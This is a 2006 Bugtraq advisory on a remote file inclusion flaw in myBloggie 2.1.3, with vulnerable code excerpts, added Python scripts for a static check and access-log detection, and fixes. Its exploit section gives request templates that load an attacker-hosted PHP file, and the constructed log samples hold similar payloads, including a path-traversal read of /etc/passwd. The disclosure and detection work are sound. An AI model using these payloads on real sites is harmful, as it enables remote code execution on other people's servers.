Message-ID: <20060809181415.16271.qmail@securityfocus.com>
Date: 9 Aug 2006 18:14:15 -0000
From: sh3ll@...ll.ir
To: bugtraq@...urityfocus.com
Subject: myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion Vulnerability

-----------------------------------------------------------------------------------------
myBloggie 2.1.3 mybloggie_root_path Remote File Inclusion
-----------------------------------------------------------------------------------------
Author   : Sh3ll
Date     : 2006/04/29
Location : Iran - Tehran
HomePage : http://www.sh3ll.ir
Email    : sh3ll[at]sh3ll[dot]ir
Critical Level : Dangerous
-----------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : myBloggie
version     : 2.1.3
URL         : http://www.mywebland.com , http://mybloggie.mywebland.com
Description : 
myBloggie is considered one of the simplest and most user-friendly, yet
feature-packed, weblog systems available to date.
-----------------------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~
admin.php, index.php and includes/db.php each build include() paths from
$mybloggie_root_path without assigning or validating it first. When PHP runs
with register_globals enabled, a GET parameter of the same name fills the
variable, so a remote attacker chooses the prefix of every file these scripts
include:
----------------------------------------admin.php----------------------------------------
....
<?php
        // $mybloggie_root_path is used here without being assigned anywhere in this file
        include($mybloggie_root_path.'spacer6.php');
        ?>
...
----------------------------------------index.php----------------------------------------
....
<?php
}
if (!isset($mode)) {
    include($mybloggie_root_path.'blog.php');
}
$template->pparse('sidevert');
}

// End right sidemenu condition

// Sidemenu menu items. You can change the menu item order here
include($mybloggie_root_path.'calendar.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'category.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'recent.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'archives.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'user.php');
include($mybloggie_root_path.'spacer.php');
if ($search) {
include($mybloggie_root_path.'searchform.php');
include($mybloggie_root_path.'spacer.php');
}
...    

------------------------------------includes/db.php--------------------------------------
....
<?php
       // same pattern: the path prefix comes from an unassigned variable
       include($mybloggie_root_path .'includes/mysql.php');
       ?>
...
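The pattern above (an include() whose path starts with a variable the file never assigns) is easy to grep for by hand in three files, but a small static check scales to a whole tree. The following Python script is an added example for this advisory, not code from myBloggie or from the advisory's author; the PHP excerpts it scans are constructed to mirror the shapes quoted above (file names, the `fixed.php` variant and the `./` value are assumptions). It flags every include/require whose path begins with `$var` when no plain assignment to `$var` appears on an earlier or the same line of that file. It is a heuristic: a variable may be set by a bootstrap file included earlier, so findings need manual confirmation, but in exactly the case described here no such assignment exists.

```python
"""Static check for include()/require() calls whose path begins with a PHP
variable that the same file has not assigned before that line.

Added example for the myBloggie advisory; the PHP below is constructed to
mirror the excerpts quoted in the advisory, it is not the real source tree."""
import re

# Constructed excerpts (not the real myBloggie files) in the shape quoted above.
SAMPLE_SOURCES = {
    "admin.php": (
        "<?php\n"
        "        include($mybloggie_root_path.'spacer6.php');\n"
        "?>\n"
    ),
    "index.php": (
        "<?php\n"
        "if (!isset($mode)) {\n"
        "    include($mybloggie_root_path.'blog.php');\n"
        "}\n"
        "include($mybloggie_root_path.'calendar.php');\n"
    ),
    "includes/db.php": (
        "<?php\n"
        "       include($mybloggie_root_path .'includes/mysql.php');\n"
        "?>\n"
    ),
    # Hypothetical hardened variant: the prefix is fixed before the include.
    "fixed.php": (
        "<?php\n"
        "$mybloggie_root_path = './';\n"
        "include($mybloggie_root_path.'blog.php');\n"
    ),
}

# include / include_once / require / require_once, optional "(", then a variable.
INCLUDE_RE = re.compile(
    r"\b(include_once|require_once|include|require)\s*\(?\s*\$([A-Za-z_]\w*)"
)
# Plain assignment "$var = ..." ; "==", "!=", "<=", ">=", ".=", "+=" do not match
# because a non-space character sits between the variable name and "=".
ASSIGN_RE = re.compile(r"\$([A-Za-z_]\w*)\s*=(?!=)")


def find_unassigned_includes(src):
    """Return (line_no, keyword, variable) for every include whose path
    variable has not been assigned on an earlier or the same line."""
    assigned = set()
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        assigned.update(ASSIGN_RE.findall(line))
        for m in INCLUDE_RE.finditer(line):
            keyword, var = m.groups()
            if var not in assigned:
                findings.append((lineno, keyword, var))
    return findings


def audit(sources):
    """Map file name -> findings, omitting files with nothing to report."""
    report = {}
    for name, src in sources.items():
        hits = find_unassigned_includes(src)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for name, hits in audit(SAMPLE_SOURCES).items():
        for lineno, keyword, var in hits:
            print(f"{name}:{lineno}: {keyword}() path starts with unassigned ${var}")
```

Run against the constructed set it reports admin.php:2, index.php:3 and :5, and includes/db.php:2, and stays silent on the hardened `fixed.php`, which is the behaviour an auditor wants when re-checking a patched tree.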
-----------------------------------------------------------------------------------------
Exploit:
~~~~~~~
http://www.target.com/[myBloggie]/admin.php?mybloggie_root_path=[Evil Script]
http://www.target.com/[myBloggie]/index.php?mybloggie_root_path=[Evil Script]
http://www.target.com/[myBloggie]/includes/db.php?mybloggie_root_path=[Evil Script]

[Evil Script] is the URL of an attacker-hosted PHP file. Because each include()
appends a fixed file name to the variable, the URL is normally terminated with
a "?" so that the appended name lands in the query string on the attacker's
server instead of changing the requested file. Exploitation requires
register_globals=On (so the GET parameter populates $mybloggie_root_path) and a
PHP configuration that allows URL includes (allow_url_fopen; on PHP 5.2 and
later also allow_url_include).
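For defenders, the three request shapes above are what to look for in web-server logs. The following Python script is an added example for this advisory, not part of myBloggie or the original post; the Apache combined-format lines it scans are constructed (addresses, timestamps and user agents are made up), and the parameter name comes from the advisory. It decodes the query string, applies a second percent-decode to catch double-encoded payloads, and flags values that are URLs or PHP stream wrappers. As an editor's generalisation beyond the remote case the advisory documents, it also flags traversal-style values (`..` or a NUL byte), since the same unvalidated include() prefix would accept a local path.

```python
"""Detect attempts to feed a remote URL (or a traversal path) into the
mybloggie_root_path parameter, from web-server access logs.

Added example for the myBloggie advisory; the log lines are constructed and
are not real traffic."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines: one normal request, then three
# attempts against the three scripts named in the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Aug/2006:18:20:01 +0000] "GET /mybloggie/index.php?mode=viewcat&cat_id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Aug/2006:18:20:07 +0000] "GET /mybloggie/admin.php?mybloggie_root_path=http://198.51.100.5/s.txt? HTTP/1.1" 200 311 "-" "libwww-perl/5.805"
203.0.113.9 - - [09/Aug/2006:18:20:09 +0000] "GET /mybloggie/includes/db.php?mybloggie_root_path=%68%74%74%70://198.51.100.5/s.txt%3F HTTP/1.1" 200 311 "-" "libwww-perl/5.805"
203.0.113.9 - - [09/Aug/2006:18:20:11 +0000] "GET /mybloggie/index.php?mybloggie_root_path=../../../../etc/passwd%00 HTTP/1.1" 200 1800 "-" "libwww-perl/5.805"
"""

# client ip, timestamp, method and request target from a combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')
# URL schemes (http://, ftp://, protocol-relative //host) and PHP stream
# wrappers that include() opens when URL includes are permitted
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//|^(?:php|data|expect):", re.I)


def classify_path_value(value):
    """Return 'remote', 'traversal' or None for a query-string value that
    parse_qs has already percent-decoded once."""
    v = unquote(value)  # second decode catches double-encoded payloads
    if REMOTE_RE.match(v):
        return "remote"
    if ".." in v or "\x00" in v:
        return "traversal"
    return None


def scan_access_log(log, param="mybloggie_root_path"):
    """Return one dict per request whose `param` value looks like an
    inclusion attempt; benign lines and unparsable lines are skipped."""
    hits = []
    for line in log.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, ts, method, target = m.groups()
        parts = urlsplit(target)
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            kind = classify_path_value(value)
            if kind:
                hits.append({"ip": ip, "time": ts, "method": method,
                             "script": parts.path, "value": value, "kind": kind})
    return hits


if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        print(f"{h['time']} {h['ip']} {h['kind']:9} {h['script']} <- {h['value']!r}")
```

The trailing "?" in the first two flagged values is the suffix trick described above, and the third line shows why decoding must happen before matching: the scheme is percent-encoded byte by byte and would slip past a literal `http://` search.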

Solution:
~~~~~~~~
Do not take $mybloggie_root_path from the request. Assign it a fixed value in
admin.php, index.php and includes/db.php before the first include(), or have
those scripts refuse to run unless loaded from a page that has already set it.
As deployment mitigations, run PHP with register_globals=Off and disable URL
includes in php.ini.
-----------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams 
